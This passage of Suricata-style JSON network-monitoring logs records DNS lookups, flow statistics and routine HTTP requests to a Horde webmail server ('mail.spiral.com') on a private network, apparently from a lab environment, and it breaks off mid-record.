{"timestamp":"2020-02-29T00:04:12.000165+0000","event_type":"stats","stats":{"uptime":13904,"capture":{"kernel_packets":133091,"kernel_drops":0},"decoder":{"pkts":133102,"bytes":92224080,"invalid":180,"ipv4":131665,"ipv6":8,"ethernet":133102,"raw":0,"null":0,"sll":0,"tcp":126621,"udp":4850,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"
reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2211,"failed_udp":108},"tx":{"http":4503,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2288}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2253,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22153,"memcap_state":0,"memcap_global":0},"http":{"memuse":104611,"memcap":0}}} {"timestamp":"2020-02-29T00:04:13.000689+0000","flow_id":1392564397028430,"event_type":"flow","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":14,"bytes_toserver":1764,"bytes_toclient":10505,"start":"2020-02-29T00:03:02.078926+0000","end":"2020-02-29T00:03:12.487416+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:13.085632+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:13.095623+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32846,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:13.260012+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983}} {"timestamp":"2020-02-29T00:04:13.850697+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18539,"tx_id":1}} {"timestamp":"2020-02-29T00:04:13.858938+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43521,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:14.000532+0000","flow_id":518199234830083,"event_type":"flow","src_ip":"192.168.10.122","src_port":55695,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:12.958211+0000","end":"2020-02-28T23:59:13.067202+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:14.059453+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":227,"tx_id":2}} {"timestamp":"2020-02-29T00:04:14.071587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240}} {"timestamp":"2020-02-29T00:04:15.000366+0000","flow_id":1169518155910251,"event_type":"flow","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1821,"bytes_toclient":2206,"start":"2020-02-29T00:03:09.248939+0000","end":"2020-02-29T00:03:14.259385+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:15.000612+0000","flow_id":1452797018606239,"event_type":"flow","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":32,"pkts_toclient":35,"bytes_toserver":8103,"bytes_toclient":30851,"start":"2020-02-29T00:03:05.494239+0000","end":"2020-02-29T00:03:14.340795+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:17.804624+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:04:17.809849+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62573,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:17.989839+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156}} {"timestamp":"2020-02-29T00:04:19.000229+0000","event_type":"stats","stats":{"uptime":13911,"capture":{"kernel_packets":133116,"kernel_drops":0},"decoder":{"pkts":133128,"bytes":92236380,"invalid":180,"ipv4":131691,"ipv6":8,"ethernet":133128,"raw":0,"null":0,"sll":0,"tcp":126643,"udp":4854,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1
735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2213,"failed_udp":108},"tx":{"http":4505,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2290}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2254,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22815,"memcap_state":0,"memcap_global":0},"http":{"memuse":108612,"memcap":0}}} {"timestamp":"2020-02-29T00:04:19.076294+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18583,"tx_id":2}} {"timestamp":"2020-02-29T00:04:20.000426+0000","flow_id":1742161835436144,"event_type":"flow","src_ip":"192.168.10.122","src_port":57837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.108656+0000","end":"2020-02-28T23:59:19.216503+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:20.000623+0000","flow_id":1755910025764076,"event_type":"flow","src_ip":"192.168.10.122","src_port":44575,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.318700+0000","end":"2020-02-28T23:59:19.430067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:21.000491+0000","flow_id":2181365191206253,"event_type":"flow","src_ip":"192.168.10.122","src_port":54269,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:20.386413+0000","end":"2020-02-28T23:59:20.494438+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:22.216488+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58517,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:22.410696+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:04:22.953806+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":28190,"tx_id":2}} {"timestamp":"2020-02-29T00:04:22.963363+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28444,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.150300+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687}} {"timestamp":"2020-02-29T00:04:23.537409+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":609,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:23.725396+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26993,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.000640+0000","flow_id":2096445098018283,"event_type":"flow","src_ip":"192.168.10.122","src_port":37955,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:23.902635+0000","end":"2020-02-28T23:59:24.013986+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:25.424689+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:25.434576+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43939,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10868,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:25.539965+0000","flow_id":1446393227616656,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43939,"proto":"UDP","dns":{"type":"answer","id":10868,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:25.641290+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3661}} 
{"timestamp":"2020-02-29T00:04:26.000170+0000","event_type":"stats","stats":{"uptime":13918,"capture":{"kernel_packets":133165,"kernel_drops":0},"decoder":{"pkts":133216,"bytes":92285631,"invalid":181,"ipv4":131779,"ipv6":8,"ethernet":133216,"raw":0,"null":0,"sll":0,"tcp":126720,"udp":4864,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2693,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2709,"synack":2700,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1736,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2218,"failed_udp":108},"tx":{"http":4508,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2295}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2257,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23144,"memcap_state":0,"memcap_global":0},"http":{"memuse":205896,"memcap":0}}} 
{"timestamp":"2020-02-29T00:04:26.001199+0000","flow_id":1755149832342807,"event_type":"flow","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1481,"bytes_toclient":6174,"start":"2020-02-29T00:03:20.445719+0000","end":"2020-02-29T00:03:25.703240+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:28.151153+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687},"app_proto":"http","fileinfo":{"filename":"\/turba\/contact.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":3}} {"timestamp":"2020-02-29T00:04:29.486791+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
